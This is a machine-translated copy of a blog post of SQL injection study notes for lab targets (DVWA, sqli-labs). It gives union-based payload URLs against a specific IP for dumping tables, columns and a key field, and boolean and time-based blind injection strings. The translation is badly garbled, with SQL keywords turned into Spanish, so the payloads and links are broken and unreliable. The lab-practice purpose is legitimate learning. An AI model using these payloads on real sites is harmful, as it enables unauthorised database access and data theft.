notas de inyección SQL DVWA

Others 2020-03-20 18:55:11 views: null

Unión de inyección
1, se determina si la inyección:
comillas simples pruebas
y pruebas
por la determinación anterior pueden ser conocidos SQL inyección
2, longitud del campo de adivinar
Orden 2 por
Orden 3 por.
adivinado longitud de campo es 2

3, el nombre de base de datos de ráfaga, base de datos de información de la versión
A
. 4, nombre de la tabla ráfaga
http://219.153.49.228:48204/show.php?id=-1 union select TABLE_NAME, 2 de INFORMATION_SCHEMA.TABLES donde TABLE_SCHEMA = 0x74657374 límite de 0,1 -

5,字段名爆
http://219.153.49.228:48204/show.php?id=-1 unión seleccionar COLUMN_NAME, 2 de INFORMATION_SCHEMA.COLUMNS donde TABLE_NAME = 0x64617461 límite de 3,1

6, los valores de campo de ráfaga
http://219.153.49.228:48204/show.php?id=-1 unión seleccionar thekey, 2 de test.data límite de 0,1-
booleana inyectar
el aprendizaje enlace: https: //blog.csdn. NET / weixin_40709439 / Article / Detalles / 81355856
la longitud) devuelve la función (la longitud de la cadena
substr () cadena tomado
ascii () devuelve el código de caracteres ASCII
sueño (n): n programa de suspender el período n segundos
si (expr1 , expr2, expr3): Si el primer juez sentencia a una declaración sobre la aplicación de la segunda afirmación es correcta si la ejecución incorrecta tercera declaración
de Boole: página vuelve Verdadero y Falso sólo dos tipos de páginas.
http://127.0.0.1/Less-8/?id=1'and (longitud (base de datos ()) )> 10 - +
longitud de la base de datos de base de datos actual () es mayor que 10, devoluciones página verdad, de lo contrario la página FALSO
tiempo de : el tiempo de sueño es determinada por la página
de prueba de la función del sueño () por si () y dormir (datos combinados) por adivinar
http://127.0.0.1/Less-9/?id=1 'y (si (ascii ( substr (base de datos (), 1,1)) > 100, dormir (10), sueño (4)) - +
Si el código ASCII actual de la primera base de datos de carácter ASCII (substr (base de datos ()) , 1,1) de la consulta actual es mayor que 100, tura dormir 10 segundos, cuatro segundos para dormir FALSO
enlace:
https://blog.csdn.net / qq_38684504 / Article / Detalles / 89849978? utm_source = Aplicación
https://blog.csdn.net/qq_36706878/article/details/79677078
https://www.cnblogs.com/yuzly/p/10725942.html

http://mp.weixin.qq.com/s?__biz=MzU2NzkxMDUyNg==&mid=2247485360&idx=1&sn=f27d65680dd4d61707eed36d7fd27172&chksm=fc974ea1cbe0c7b7aa504822d2c7097c13af1fede65a9fcf2125bbd3288f83e61eaa22c0970e&mpshare=1&scene=23&srcid=&sharer_sharetime=1576467591833&sharer_shareid=127e537f73175af0d605029323019715#rd

sqlmap:
https://blog.csdn.net/qq_33530840/article/details/82144515

https://www.cnblogs.com/lanyincao/p/11179192.html

q20010619
Publicado siete artículos originales · ganado elogios 0 · Vistas 79
carta privada preocupaciones

Supongo que te gusta

Origin blog.csdn.net/q20010619/article/details/104875220
Recomendado
Clasificación
Diario
Más
2024-05-19(0)
2024-05-18(30)
2024-05-17(4)
2024-05-16(22)
2024-05-15(5)
2024-05-14(10)
2024-05-13(7)
2024-05-12(22)
2024-05-11(31)
2024-05-10(32)

Code World

© 2018 codetd.com